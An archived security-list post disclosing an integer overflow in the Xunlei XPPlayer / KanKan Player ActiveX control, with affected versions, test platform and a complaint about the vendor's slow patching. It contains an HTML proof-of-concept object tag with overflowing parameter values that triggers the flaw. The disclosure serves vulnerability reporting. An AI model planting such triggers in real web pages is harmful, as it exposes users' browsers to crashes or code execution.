Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Xunlei XPPlayer / Xunlei KanKan Player ActiveX integer overflow

From:superli_(at)_safe-mail.net <superli_(at)_safe-mail.net>
Date:20.01.2010
Subject:Xunlei XPPlayer ActiveX Remote Exec 0day POC

# Date: 2010.01.17
# Author: superli
# Software Link: http://down.sandai.net/Thunder5.9.14.1246.exe
# Version: <= 5.9.14.1246
# Tested on: xpsp3 ie6
# Greeting to Xunlei Security Center guys,your guys still not yet release patch or new version to fix the vunl which
also can #attack Xunlei KanKan Player(http://dl.xunlei.com/xmp.html).I exposed this vunl two weeks ago,are you really
responsible for the security of millions users?
# POC Code :
<object id=ooxooxx classid="CLSID:{F3E70CEA-956E-49CC-B444-73AFE593AD7F}">
<PARAM NAME="_cx" VALUE="0xFFFFFFFF">
<PARAM NAME="_cy" VALUE="0xFFFFFFFF">
<PARAM NAME="UiMode" VALUE="-1">
<PARAM NAME="InnerPlayerType" VALUE="-1">
</object>

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru